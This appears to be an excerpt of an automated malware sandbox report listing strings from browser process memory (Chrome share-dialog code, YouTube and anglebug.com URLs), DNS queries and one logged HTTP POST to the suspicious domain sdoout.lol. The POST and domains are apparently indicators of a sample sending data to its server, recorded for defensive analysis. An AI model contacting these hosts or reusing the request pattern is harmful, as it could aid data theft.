Source: chrome.exe, 00000011.00000003.2789765310.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2790239586.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2790710500.0000259800304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000011.00000003.2789765310.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2790239586.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2790710500.0000259800304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: EAXdwMrdIdPn.EAXdwMrdIdPn
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: sdoout.lol
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----37q1nohlnycbieu3eu3oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: sdoout.lolContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2915224736.000002E40037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2915224736.000002E40037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2915224736.000002E40037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
